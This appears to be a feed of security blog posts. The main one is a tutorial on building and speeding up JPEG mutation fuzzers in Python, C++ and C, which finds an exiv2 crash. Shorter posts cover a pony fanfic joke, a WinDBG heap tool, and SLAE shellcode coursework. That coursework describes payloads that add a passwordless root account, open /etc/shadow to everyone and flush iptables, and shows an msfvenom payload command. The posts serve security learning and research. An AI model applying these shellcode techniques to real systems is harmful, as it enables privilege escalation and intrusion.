   100000    0.074    0.000    2.133    0.000 subprocess.py:1014(wait)
   100000    0.463    0.000    2.059    0.000 subprocess.py:1621(_wait)
   100000    0.274    0.000    2.046    0.000 selectors.py:351(register)
   100000    0.782    0.000    1.702    0.000 selectors.py:234(register)
    50000    0.055    0.000    1.507    0.000 subprocess.py:1608(_try_wait)
    50000    1.452    0.000    1.452    0.000 {built-in method posix.waitpid}
   350000    0.424    0.000    1.436    0.000 subprocess.py:1471(<genexpr>)
 12066317    1.339    0.000    1.339    0.000 {method 'getrandbits' of '_random.Random' objects}
   100000    0.466    0.000    1.048    0.000 os.py:674(__getitem__)
   100000    1.014    0.000    1.014    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

As you can see from the metrics, we only spend 14 cumulative seconds in bit_flip() at this point! In our last go-round, we spent 25 seconds here, this is almost twice as fast at this point. We’re doing a good job of optimizing in my opinion here.

Now that we have our ideal Python benchmark (keep in mind there might be opportunities for multi-processing or multi-threading but let’s save this idea for another time), let’s go ahead and port our fuzzer to a new language, C++ and test the performance.

New Fuzzer in C++

To get started, let’s just go ahead and flat out run our newly optimized python fuzzer through 100,000 fuzzing iterations and see how long in total it takes.

118749892 function calls (118749755 primitive calls) in 256.881 seconds

100k iterations in only 256 seconds! That destroys our previous fuzzer.

That will be our benchmark we try to beat in C++. Now, as unfamiliar as I am with the nuances of Python development, multiply that by 10 and you’ll have my unfamiliarity with C++. This code might be laughable to some, but it’s the best I could manage at the present moment and we can explain each function as it relates to our previous Python code.

Let’s go through, function by function, and describe their implementation.

//
// this function simply creates a stream by opening a file in binary mode;
// finds the end of the file, creates a string 'data', resizes 'data' to be the
// same size as the file, moves the file pointer back to the beginning of the
// file, and reads the file contents into the 'data' string;
//
std::string get_bytes(std::string filename)
{
	std::ifstream fin(filename, std::ios::binary);

	if (fin.is_open())
	{
		fin.seekg(0, std::ios::end);
		std::string data;
		data.resize(fin.tellg());
		fin.seekg(0, std::ios::beg);
		fin.read(&data[0], data.size());

		return data;
	}

	else
	{
		std::cout << "Failed to open " << filename << ".\n";
		exit(1);
	}

}

This function, as my comment says, simply retrieves a byte string from our target file, which in the case of our testing will still be Canon_40D.jpg.

//
// this will take 1% of the bytes from our valid jpeg and
// flip a random bit in the byte and return the altered string
//
std::string bit_flip(std::string data)
{
	
	int size = (data.length() - 4);
	int num_of_flips = (int)(size * .01);

	// get a vector full of 1% of random byte indexes
	std::vector<int> picked_indexes;
	for (int i = 0; i < num_of_flips; i++)
	{
		int picked_index = rand() % size;
		picked_indexes.push_back(picked_index);
	}

	// iterate through the data string at those indexes and flip a bit
	for (int i = 0; i < picked_indexes.size(); ++i)
	{
		int index = picked_indexes[i];
		char current = data.at(index);
		int decimal = ((int)current & 0xff);
		
		int bit_to_flip = rand() % 8;
		
		decimal ^= 1 << bit_to_flip;
		decimal &= 0xff;
		
		data[index] = (char)decimal;
	}

	return data;

}

This function is a direct equivalent of our bit_flip() function in our Python script.

//
// takes mutated string and creates new jpeg with it;
//
void create_new(std::string mutated)
{
	std::ofstream fout("mutated.jpg", std::ios::binary);

	if (fout.is_open())
	{
		fout.seekp(0, std::ios::beg);
		fout.write(&mutated[0], mutated.size());
	}
	else
	{
		std::cout << "Failed to create mutated.jpg" << ".\n";
		exit(1);
	}

}

This function will simply create a temporary mutated.jpg file, similar to our create_new() function that we had in the Python script.

//
// function to run a system command and store the output as a string;
// https://www.jeremymorgan.com/tutorials/c-programming/how-to-capture-the-output-of-a-linux-command-in-c/
//
std::string get_output(std::string cmd)
{
	std::string output;
	FILE * stream;
	char buffer[256];

	stream = popen(cmd.c_str(), "r");
	if (stream)
	{
		while (!feof(stream))
		{
			if (fgets(buffer, 256, stream) != NULL)
			{
				output.append(buffer);
			}
		}
		pclose(stream);
	}

	return output;

}

//
// we actually run our exiv2 command via the get_output() func;
// retrieve the output in the form of a string and then we can parse the string;
// we'll save all the outputs that result in a segfault or floating point except;
//
void exif(std::string mutated, int counter)
{
	std::string command = "exif mutated.jpg -verbose 2>&1";

	std::string output = get_output(command);

	std::string segfault = "Segmentation";
	std::string floating_point = "Floating";

	std::size_t pos1 = output.find(segfault);
	std::size_t pos2 = output.find(floating_point);

	if (pos1 != -1)
	{
		std::cout << "Segfault!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".\n";
			exit(1);
		}
	}
	else if (pos2 != -1)
	{
		std::cout << "Floating Point!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".\n";
			exit(1);
		}
	}
}

These two functions work together. get_output takes a C++ string as a parameter and will run that command on the operating system and capture the output. The function then returns the output as a string to the calling function exif().

exif() will take the output and look for Segmentation fault or Floating point exception errors and then if found, will write those bytes to a file and save them as a crash.<counter>.jpg file. Very similar to our Python fuzzer.

//
// simply generates a vector of strings that are our 'magic' values;
//
std::vector<std::string> vector_gen()
{
	std::vector<std::string> magic;

	using namespace std::string_literals;

	magic.push_back("\xff");
	magic.push_back("\x7f");
	magic.push_back("\x00"s);
	magic.push_back("\xff\xff");
	magic.push_back("\x7f\xff");
	magic.push_back("\x00\x00"s);
	magic.push_back("\xff\xff\xff\xff");
	magic.push_back("\x80\x00\x00\x00"s);
	magic.push_back("\x40\x00\x00\x00"s);
	magic.push_back("\x7f\xff\xff\xff");

	return magic;
}

//
// randomly picks a magic value from the vector and overwrites that many bytes in the image;
//
std::string magic(std::string data, std::vector<std::string> magic)
{
	
	int vector_size = magic.size();
	int picked_magic_index = rand() % vector_size;
	std::string picked_magic = magic[picked_magic_index];
	int size = (data.length() - 4);
	int picked_data_index = rand() % size;
	data.replace(picked_data_index, magic[picked_magic_index].length(), magic[picked_magic_index]);

	return data;

}

//
// returns 0 or 1;
//
int func_pick()
{
	int result = rand() % 2;

	return result;
}

These functions are pretty similar to our Python implementation as well. vector_gen() pretty much just creates our vector of ‘magic values’ and then subsequent functions like magic() use the vector to randomly pick an index and then overwrite data in the valid jpeg with mutated data accordingly.

func_pick() is very simple and just returns a 0 or a 1 so that our fuzzer can randomly bit_flip() or magic() mutate our valid jpeg. To keep things consistent, let’s have our fuzzer only choose bit_flip() for the time being by adding a temporary line of function = 1 to our program so that we match our Python testing.

Here is our main() function which executes all of our code so far:

int main(int argc, char** argv)
{

	if (argc < 3)
	{
		std::cout << "Usage: ./cppfuzz <valid jpeg> <number_of_fuzzing_iterations>\n";
		std::cout << "Usage: ./cppfuzz Canon_40D.jpg 10000\n";
		return 1;
	}

	// start timer
	auto start = std::chrono::high_resolution_clock::now();

	// initialize our random seed
	srand((unsigned)time(NULL));

	// generate our vector of magic numbers
	std::vector<std::string> magic_vector = vector_gen();

	std::string filename = argv[1];
	int iterations = atoi(argv[2]);

	int counter = 0;
	while (counter < iterations)
	{

		std::string data = get_bytes(filename);

		int function = func_pick();
		function = 1;
		if (function == 0)
		{
			// utilize the magic mutation method; create new jpg; send to exiv2
			std::string mutated = magic(data, magic_vector);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
		else
		{
			// utilize the bit flip mutation; create new jpg; send to exiv2
			std::string mutated = bit_flip(data);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
	}

	// stop timer and print execution time
	auto stop = std::chrono::high_resolution_clock::now();
	auto duration = std::chrono::duration_cast<std::chrono::milliseconds>(stop - start);
	std::cout << "Execution Time: " << duration.count() << "ms\n";

	return 0;
}

We get a valid JPEG to mutate and a number of fuzzing iterations from the command line arguments. We then have some timing mechanisms in place with the std::chrono namespace to time how long our program takes to execute.

We’re kind of cheating here by only selecting bit_flip() type mutations, but that is what we did in Python as well so we want an ‘Apples to Apples’ comparison.

Let’s go ahead and run this for 100,000 iterations and compare it our Python fuzzer benchmark of 256 seconds.

Once we run our C++ fuzzer, we get a printed time spent in milliseconds of: Execution Time: 172638ms or 172 seconds.

So we comfortably destroyed our Python fuzzer with our new C++ fuzzer! This is so exciting. Let’s go ahead and do some math here: 172/256 ≈ 67%, so the C++ implementation takes about two-thirds of the time, shaving roughly 33% off the execution time. (God I hope you aren’t some 200 IQ math genius reading this and throwing up on your keyboard).

Let’s take our optimized Python and C++ fuzzers and take on a new target!

Selecting a New Victim

Looking at what comes pre-installed on Kali Linux since that’s our operating environment, let’s take a peek at exiv2 which is found in /usr/bin/exiv2.

root@kali:~# exiv2 -h
Usage: exiv2 [ options ] [ action ] file ...

Manipulate the Exif metadata of images.

Actions:
  ad | adjust   Adjust Exif timestamps by the given time. This action
                requires at least one of the -a, -Y, -O or -D options.
  pr | print    Print image metadata.
  rm | delete   Delete image metadata from the files.
  in | insert   Insert metadata from corresponding *.exv files.
                Use option -S to change the suffix of the input files.
  ex | extract  Extract metadata to *.exv, *.xmp and thumbnail image files.
  mv | rename   Rename files and/or set file timestamps according to the
                Exif create timestamp. The filename format can be set with
                -r format, timestamp options are controlled with -t and -T.
  mo | modify   Apply commands to modify (add, set, delete) the Exif and
                IPTC metadata of image files or set the JPEG comment.
                Requires option -c, -m or -M.
  fi | fixiso   Copy ISO setting from the Nikon Makernote to the regular
                Exif tag.
  fc | fixcom   Convert the UNICODE Exif user comment to UCS-2. Its current
                character encoding can be specified with the -n option.

Options:
   -h      Display this help and exit.
   -V      Show the program version and exit.
   -v      Be verbose during the program run.
   -q      Silence warnings and error messages during the program run (quiet).
   -Q lvl  Set log-level to d(ebug), i(nfo), w(arning), e(rror) or m(ute).
   -b      Show large binary values.
   -u      Show unknown tags.
   -g key  Only output info for this key (grep).
   -K key  Only output info for this key (exact match).
   -n enc  Charset to use to decode UNICODE Exif user comments.
   -k      Preserve file timestamps (keep).
   -t      Also set the file timestamp in 'rename' action (overrides -k).
   -T      Only set the file timestamp in 'rename' action, do not rename
           the file (overrides -k).
   -f      Do not prompt before overwriting existing files (force).
   -F      Do not prompt before renaming files (Force).
   -a time Time adjustment in the format [-]HH[:MM[:SS]]. This option
           is only used with the 'adjust' action.
   -Y yrs  Year adjustment with the 'adjust' action.
   -O mon  Month adjustment with the 'adjust' action.
   -D day  Day adjustment with the 'adjust' action.
   -p mode Print mode for the 'print' action. Possible modes are:
             s : print a summary of the Exif metadata (the default)
             a : print Exif, IPTC and XMP metadata (shortcut for -Pkyct)
             t : interpreted (translated) Exif data (-PEkyct)
             v : plain Exif data values (-PExgnycv)
             h : hexdump of the Exif data (-PExgnycsh)
             i : IPTC data values (-PIkyct)
             x : XMP properties (-PXkyct)
             c : JPEG comment
             p : list available previews
             S : print structure of image
             X : extract XMP from image
   -P flgs Print flags for fine control of tag lists ('print' action):
             E : include Exif tags in the list
             I : IPTC datasets
             X : XMP properties
             x : print a column with the tag number
             g : group name
             k : key
             l : tag label
             n : tag name
             y : type
             c : number of components (count)
             s : size in bytes
             v : plain data value
             t : interpreted (translated) data
             h : hexdump of the data
   -d tgt  Delete target(s) for the 'delete' action. Possible targets are:
             a : all supported metadata (the default)
             e : Exif section
             t : Exif thumbnail only
             i : IPTC data
             x : XMP packet
             c : JPEG comment
   -i tgt  Insert target(s) for the 'insert' action. Possible targets are
           the same as those for the -d option, plus a modifier:
             X : Insert metadata from an XMP sidecar file <file>.xmp
           Only JPEG thumbnails can be inserted, they need to be named
           <file>-thumb.jpg
   -e tgt  Extract target(s) for the 'extract' action. Possible targets
           are the same as those for the -d option, plus a target to extract
           preview images and a modifier to generate an XMP sidecar file:
             p[<n>[,<m> ...]] : Extract preview images.
             X : Extract metadata to an XMP sidecar file <file>.xmp
   -r fmt  Filename format for the 'rename' action. The format string
           follows strftime(3). The following keywords are supported:
             :basename:   - original filename without extension
             :dirname:    - name of the directory holding the original file
             :parentname: - name of parent directory
           Default filename format is %Y%m%d_%H%M%S.
   -c txt  JPEG comment string to set in the image.
   -m file Command file for the modify action. The format for commands is
           set|add|del <key> [[<type>] <value>].
   -M cmd  Command line for the modify action. The format for the
           commands is the same as that of the lines of a command file.
   -l dir  Location (directory) for files to be inserted from or extracted to.
   -S .suf Use suffix .suf for source files for insert command.

Looking at the help guidance, let’s just go ahead and take a crack at pr for Print image metadata and also -v for Be verbose during the program run. You can see from this help output that there is plenty of attack surface here for us to explore, but let’s keep things simple for now.

Our command string now in our fuzzers will be something like exiv2 pr -v mutated.jpg.

Let’s go ahead and update our fuzzers and see if we can find some more bugs on a much harder target. It’s worth mentioning that this target is currently supported and is not a trivial binary to find bugs in, unlike our last target (an unsupported 7-year-old project on GitHub).

This target has already been fuzzed by much more advanced fuzzers; you can simply google something like ‘ASan exiv2’ and get plenty of hits of fuzzers producing segfaults in the binary and forwarding the ASan output to the GitHub repository as a bug report. This is a significant step up from our last target.

exiv2 on Github

exiv2 Website

Fuzzing Our New Target

Let’s start off with our new and improved Python fuzzer and monitor its performance over 50,000 iterations. Let’s add some code that monitors for Floating Point exceptions in addition to our Segmentation Fault detection (call it a hunch!). Our new exif() function will look like this:

def exif(counter,data):

    # requires: from subprocess import Popen, PIPE
    p = Popen(["exiv2", "pr", "-v", "mutated.jpg"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    # a return code of -11 means the child was killed by SIGSEGV
    if p.returncode == -11:
        f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
        f.write(data)
        f.close()
        print("Segfault!")

    # a return code of -8 means the child was killed by SIGFPE
    elif p.returncode == -8:
        f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
        f.write(data)
        f.close()
        print("Floating Point!")

Looking at the output from python3 -m cProfile -s cumtime subpro.py ~/jpegs/Canon_40D.jpg:

75780446 function calls (75780309 primitive calls) in 213.595 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  213.595  213.595 {built-in method builtins.exec}
        1    1.481    1.481  213.595  213.595 subpro.py:3(<module>)
    50000    0.818    0.000  187.205    0.004 subpro.py:111(exif)
    50000    0.543    0.000  143.499    0.003 subprocess.py:920(communicate)
    50000    6.773    0.000  142.873    0.003 subprocess.py:1662(_communicate)
  1641352    3.186    0.000  122.668    0.000 selectors.py:402(select)
  1641352  118.799    0.000  118.799    0.000 {method 'poll' of 'select.poll' objects}
    50000    1.220    0.000   42.888    0.001 subprocess.py:681(__init__)
    50000    4.400    0.000   39.364    0.001 subprocess.py:1412(_execute_child)
  1691919   25.759    0.000   25.759    0.000 {built-in method posix.read}
    50000    3.863    0.000   13.938    0.000 subpro.py:14(bit_flip)
  7950000    3.587    0.000    9.991    0.000 random.py:256(choice)
    50000    7.495    0.000    7.495    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.148    0.000    7.081    0.000 subpro.py:105(create_new)
  7950000    3.884    0.000    5.764    0.000 random.py:224(_randbelow)
   200000    4.582    0.000    4.582    0.000 {built-in method io.open}
    50000    4.192    0.000    4.192    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.339    0.000    3.612    0.000 os.py:617(get_exec_path)
    50000    1.641    0.000    3.309    0.000 subpro.py:8(get_bytes)
   100000    0.077    0.000    1.822    0.000 subprocess.py:1014(wait)
   100000    0.432    0.000    1.746    0.000 subprocess.py:1621(_wait)
   100000    0.256    0.000    1.735    0.000 selectors.py:351(register)
   100000    0.619    0.000    1.422    0.000 selectors.py:234(register)
   350000    0.380    0.000    1.402    0.000 subprocess.py:1471(<genexpr>)
 12066004    1.335    0.000    1.335    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.063    0.000    1.222    0.000 subprocess.py:1608(_try_wait)
    50000    1.160    0.000    1.160    0.000 {built-in method posix.waitpid}
   100000    0.519    0.000    1.143    0.000 os.py:674(__getitem__)
  1691352    0.902    0.000    1.097    0.000 selectors.py:66(__len__)
  7234121    1.023    0.000    1.023    0.000 {method 'append' of 'list' objects}
-----SNIP-----

It appears we took 213 seconds total and didn’t really find any bugs. That’s a shame, but it could just be luck. Let’s run our C++ fuzzer in the same exact circumstances and monitor the output.

Here we go, we get a similar run but with a much improved time:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 50000
Execution Time: 170829ms

That’s a pretty significant improvement, 43 seconds. That’s 20% off of our Python time. (Again, I apologize to math people.)

Let’s keep our C++ fuzzer running for a bit and see if we find any bugs :).

Bugs on Our New Target!

After maybe 10 seconds of running the fuzzer again, I got this terminal output:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 1000000
Floating Point!

It appears we have satisfied the requirements for a Floating Point exception. We should have a nice jpg waiting for us in the cppcrashes directory.

root@kali:~/cppcrashes# ls
crash.522.jpg

Let’s confirm the bug by running exiv2 against this sample:

root@kali:~/cppcrashes# exiv2 pr -v crash.522.jpg
File 1/1: crash.522.jpg
Error: Offset of directory Image, entry 0x011b is out of bounds: Offset = 0x080000ae; truncating the entry
Warning: Directory Image, entry 0x8825 has unknown Exif (TIFF) type 68; setting type size 1.
Warning: Directory Image, entry 0x8825 doesn't look like a sub-IFD.
File name       : crash.522.jpg
File size       : 7958 Bytes
MIME type       : image/jpeg
Image size      : 100 x 68
Camera make     : Aanon
Camera model    : Canon EOS 40D
Image timestamp : 2008:05:30 15:56:01
Image number    : 
Exposure time   : 1/160 s
Aperture        : F7.1
Floating point exception

We indeed found a new bug! This is super exciting. We should issue a bug report to the exiv2 developers on Github.

Conclusion

We first optimized our fuzzer in Python and then rewrote it in C++. We gained some massive performance advantages and even found some new bugs on a new, harder target.

For some fun, let’s compare our original fuzzer’s performance for 50,000 iterations:

123052109 function calls (123001828 primitive calls) in 6243.939 seconds

As you can see, 6,243 seconds is significantly slower than our C++ fuzzer benchmark of 170 seconds.

Addendum 15/May/2020

Just playing around with porting the C++ fuzzer to C, I made some modest improvements on my own. One of the logic changes was to collect the data from the original valid image only once, copy that data into a newly allocated buffer on each fuzzing iteration, and then perform the mutation operations on the newly allocated buffer. This C version of basically the same C++ fuzzer performed pretty well compared to the C++ fuzzer. Here is a comparison between the two for 200,000 iterations (you can ignore the crash findings as this fuzzer is extremely dumb and 100% random):

h0mbre:~$ time ./cppfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m45.371s
user    7m14.561s
sys     3m10.529s

h0mbre:~$ time ./cfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m7.686s
user    7m27.503s
sys     2m20.843s

So, over 200,000 iterations we end up saving about 35-40 seconds, which was pretty typical in my testing. Just by making a few logic changes and using fewer C++-provided abstractions we saved a lot of sys time and increased speed by about 5%.
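As a rough illustration of that logic change (this is not the exact fuzzer code; the helper names and the commented-out mutate/exif calls are placeholders), the read-once / copy-per-iteration pattern in C looks something like this:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static char *original;   // pristine copy of the valid JPEG, read only once
static long orig_size;

void read_original(const char *path) {
    FILE *f = fopen(path, "rb");
    fseek(f, 0, SEEK_END);
    orig_size = ftell(f);
    fseek(f, 0, SEEK_SET);
    original = malloc(orig_size);
    fread(original, 1, orig_size, f);
    fclose(f);
}

void fuzz_iteration(int iteration) {
    // fresh working copy each round; mutate it, write it out, run the target
    char *data = malloc(orig_size);
    memcpy(data, original, orig_size);
    // mutate(data, orig_size);              // bit flips, magic numbers, etc.
    // write_file("mutated.jpeg", data, orig_size);
    // exif(iteration);                      // spawn exiv2 against mutated.jpeg
    free(data);
}

The point is simply that the disk read for the original sample happens once, while each iteration only pays for a malloc and a memcpy.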

Monitoring Child Process Exit Status

After completing the C translation, I went to Twitter to ask for suggestions about performance improvements. @lcamtuf, the creator of AFL, explained to me that I shouldn’t be using popen() in my code as it spawns a shell and performs abysmally. Here is the code segment I asked for help on:

void exif(int iteration) {
    
    FILE *fileptr;
    
    //fileptr = popen("exif_bin target.jpeg -verbose >/dev/null 2>&1", "r");
    fileptr = popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r");

    int status = WEXITSTATUS(pclose(fileptr));
    switch(status) {
        case 253:
            break;
        case 0:
            break;
        case 1:
            break;
        default:
            crashes++;
            printf("\r[>] Crashes: %d", crashes);
            fflush(stdout);
            char command[50];
            sprintf(command, "cp mutated.jpeg ccrashes/crash.%d.%d",
             iteration,status);
            system(command);
            break;
    }
}

As you can see, we use popen(), run a shell-command, and then close the file pointer to the child process and return the exit-status for monitoring with the WEXITSTATUS macro. I was filtering out some exit codes that I didn’t care about like 253, 0, and 1, and was hoping to see some related to the floating point errors we already found with our C++ fuzzer or maybe even a segfault. @lcamtuf suggested that instead of popen(), I call fork() to spawn a child process, execvp() to have the child process execute a command, and then finally use waitpid() to await the child process termination and return the exit status.

Since we don’t have a proper shell in this syscall path, I had to also open a handle to /dev/null and call dup2() to route both stdout and stderr there as we don’t care about the command output. I also used the WTERMSIG macro to retrieve the signal that terminated the child process in the event that the WIFSIGNALED macro returned true, which would indicate we got a segfault or floating point exception, etc. So now, our updated function looks like this:

void exif(int iteration) {
    
    char* file = "exiv2";
    char* argv[4];
    argv[0] = "pr";
    argv[1] = "-v";
    argv[2] = "mutated.jpeg";
    argv[3] = NULL;
    pid_t child_pid;
    int child_status;

    child_pid = fork();
    if (child_pid == 0) {
        // this means we're the child process
        int fd = open("/dev/null", O_WRONLY);

        // dup both stdout and stderr and send them to /dev/null
        dup2(fd, 1);
        dup2(fd, 2);
        close(fd);

        execvp(file, argv);
        // shouldn't return, if it does, we have an error with the command
        printf("[!] Unknown command for execvp, exiting...\n");
        exit(1);
    }
    else {
        // this is run by the parent process
        do {
            pid_t tpid = waitpid(child_pid, &child_status, WUNTRACED |
             WCONTINUED);
            if (tpid == -1) {
                printf("[!] Waitpid failed!\n");
                perror("waitpid");
            }
            if (WIFEXITED(child_status)) {
                //printf("WIFEXITED: Exit Status: %d\n", WEXITSTATUS(child_status));
            } else if (WIFSIGNALED(child_status)) {
                crashes++;
                int exit_status = WTERMSIG(child_status);
                printf("\r[>] Crashes: %d", crashes);
                fflush(stdout);
                char command[50];
                sprintf(command, "cp mutated.jpeg ccrashes/%d.%d", iteration, 
                exit_status);
                system(command);
            } else if (WIFSTOPPED(child_status)) {
                printf("WIFSTOPPED: Exit Status: %d\n", WSTOPSIG(child_status));
            } else if (WIFCONTINUED(child_status)) {
                printf("WIFCONTINUED: Exit Status: Continued.\n");
            }
        } while (!WIFEXITED(child_status) && !WIFSIGNALED(child_status));
    }
}

You can see that this drastically improves performance for our 200,000 iteration benchmark:

h0mbre:~$ time ./cfuzz2 Canon_40D.jpg 200000
<snipped_results>

real    8m30.371s
user    6m10.219s
sys     2m2.098s

Summary of Results

  • C++ Fuzzer – 310 iterations/sec
  • C Fuzzer – 329 iterations/sec (+ 6%)
  • C Fuzzer 2.0 – 392 iterations/sec (+ 26%)

Thanks to @lcamtuf and @carste1n for the help.

I’ve uploaded the code here: https://github.com/h0mbre/Fuzzing/tree/master/JPEGMutation

Taking a joke a little too far.

By: tiraniddo
1 April 2020 at 11:00

Extract from “Rainbow Dash and the Open Plan Office”.

This is an extract from my upcoming 29 chapter My Little Pony fanfic. Clearly I do not own the rights to the characters etc.

Dash was tapping away on the only thing a pony could ever love, the Das Keyboard with rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes to illumination. It had been bought in a pique of disdain for equine kind, a real low point in what Dash liked to call, annus mirabilis. It was clear Dash liked to sound smart but had skipped Latin lessons at school.

Applejack tried to remain oblivious to the click-clacking coming from the next desk over. But even with the comically over-sized noise cancelling headphones, more akin to ear defenders than something to listen to music with, it all got too much.

“Hey, Dash, did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge of anger. “Very much so, it allows my creativity to flow. Real professionals need real tools. You can’t be a real professional with some inferior Cherry Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit that might be true, but you’ve only committed 10 lines of code in the past week.”. This elicited an indignant response from Dash, “I spend my time meticulously crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art to a change request for reading by mere mortals like yourself.”.

Letting out a groan of frustration Applejack went back to staring at the monitor to wonder why the borrow checker was throwing errors again. The job was only to make ends meet until the debt on the farm could be repaid after the “incident”. At any rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss, nothing that pony could do would really lead to anything close to a satisfactory defenestration.

“Have you ever wondered how everyone on the internet is so stupid?”, Dash opined, almost to nopony in particular. Applejack, clearly seeing an in, retorted “Well George Carlin is quoted as saying “Think of how stupid the average person is, and realize half of them are stupider than that.”, it’s clear where the dividing line exists in this office”. “I think if George had the chance to use Twitter he might have revised the calculations a bit” Dash quipped either ignoring the barb or perhaps missing it entirely.

To be continued… not.

heappo: a WinDBG extension for heap tracing

24 March 2020 at 00:00
Preface: During these days of forced quarantine time-off, I have been reviewing notes and exercises from the outstanding Corelan Advanced training I took last October at Brucon, and so I decided to work on some tooling I had in mind lately. The idea came from this research by Sam Brown from F-Secure: after testing the tool I decided to port it to the latest PyKD version so that it supports both Python3 and Python2 and runs on both x86 and x64 (tested on the latest Win10 1909). I aptly named this effort Heappo and here are some of its key features and enhancements.

Shellcode Polymorphism

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
GitHub:

SLAE Assignment #6 - Polymorphic
     - Create a polymorphic version of 3 shellcodes from Shell-Storm
     - The polymorphic versions cannot be larger than 150% of the existing shellcode
     - Bonus: points for making it shorter in length than original



~~~~~~~~~//*****//~~~~~~~~~


0x1 - add root user (r00t) with no password to /etc/passwd
link: www.shell-storm.org/shellcode/files/shellcode-211.php

Original shellcode, disassembled using ndisasm



For this, we can focus on lines 6, B, 15 and 25, 2A, 2F. These instructions correspond to the two syscalls: open() and write(). The open() opens /etc//passwd and write() writes r00t::0:0:::. I was able to change the values by running add and sub operations. I could have changed r00t::0:0::: as well using XOR operations or by getting rid of the push instructions (replacing them with mov); however, I would have exceeded the 150% shellcode size limit.
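As a small, language-neutral illustration of the add/sub masking idea (this is not the author's code; the 0x11111111 adjustment value is just the one used in section 0x2 below, and the dwords are the /etc//passwd pushes discussed in the shellcode analysis post), a tiny C helper can precompute the disguised constants that the polymorphic stub would restore at run time:

#include <stdio.h>

int main(void) {
    // dwords for "/etc//passwd" as pushed by the original shellcode
    unsigned int dwords[] = { 0x64777373, 0x61702f2f, 0x6374652f };
    unsigned int mask = 0x11111111;   // arbitrary adjustment value

    for (int i = 0; i < 3; i++) {
        // the polymorphic stub pushes (dword - mask) and later adds the mask
        // back, so the original bytes never appear verbatim in the shellcode
        printf("push 0x%08x   ; add 0x%08x back to recover 0x%08x\n",
               dwords[i] - mask, mask, dwords[i]);
    }
    return 0;
}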





0x2 - chmod(/etc/shadow, 0777)
link: www.shell-storm.org/shellcode/files/shellcode-593.php

Here's the original shellcode, with a size of 29 bytes, disassembled using ndisasm. Similar to 0x1, lines 3, 8, and D show the file name /etc//shadow, which means this will be the focus of the polymorphism process. Line 14 shows the permission 0777, which could also be polymorphed using some add or sub instructions, but I didn't do it based on the 150% shellcode size requirement.



For the polymorphism, I used a combination of the same technique from 0x1 plus a JMP-CALL-POP technique. I subtracted 0x11111111 from each dword and then dynamically loaded the new values onto the stack. After they are popped, I added 0x11111111 to recover the original values before they are pushed back onto the stack again. The size of the new shellcode is 44 bytes.


0x3 - iptables -F
link: www.shell-storm.org/shellcode/files/shellcode-368.php


The following instructions produce the string /sbin/iptables -F, which then gets executed using execve():




I used the JMP-CALL-POP method to change it up. Basically the /sbin/iptables -F hex codes from above are replaced. The new shellcode size is 58 bytes.


Thank you for reading.

Shellcode Analysis

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #5 - Analysis of Linux/x86 msfpayload shellcodes

          - Use GDB/ndisasm/libemu to dissect the functionality of the shellcode


~~~~~~~~~//*****//~~~~~~~~~


For this assignment, I will be using the first three Linux/x86 payloads generated by msfvenom (formerly msfpayload)


0x1 - linux/x86/adduser


A quick ndisasm gives us the following:

msfvenom -p linux/x86/adduser -f raw | ndisasm -u -



The first obvious ones are these dword pushes:

           push dword 0x64777373
           push dword 0x61702f2f
           push dword 0x6374652f

The following dwords (in little-endian) are the hex representation of /etc//passwd as shown below:


However, it is still unclear as to what is being done to the /etc//passwd file. I think this is where we can use gdb to see what system calls are being invoked.

I generated the shellcode from msfvenom, loaded it in shellcode.c, compiled and loaded in gdb.




Once loaded in gdb...we first set a breakpoint for shellcode: break *&code 



We can see again the /etc//passwd in lines +15, +20, +25. We can also see several int 0x80 (lines +7, +35, +86, +91) for the system calls. We can add breakpoints on these lines to see what system calls are loaded into eax. 


Note: Here is a list of all the system calls with their corresponding call numbers, found in /usr/include/i386-linux-gnu/asm/unistd_32.h


Syscall #1:  eax has 46 or setgid() loaded to it.



The setgid() call is pretty straightforward. This call sets a user's group id. In this case, the group id is set to 0 as seen in the first two lines. The call only requires one argument; in this case 0 is loaded into ebx (mov ebx, ecx) as the argument.

                                                  root@kali:~/SLAE# id
uid=0(root) gid=0(root) groups=0(root)



                   
Syscall #2: eax has 5 or open() loaded to it.


open() here opens the /etc/passwd file as the pathname and sets the flags to O_RDWR (Read/Write). This step requires root access, hence why setgid() was called first to set the user's group id to 0.

                      
                             push   0x64777373
                             push   0x61702f2f
                             push   0x6374652f




Syscall #3: eax has 4 or write() loaded to it.


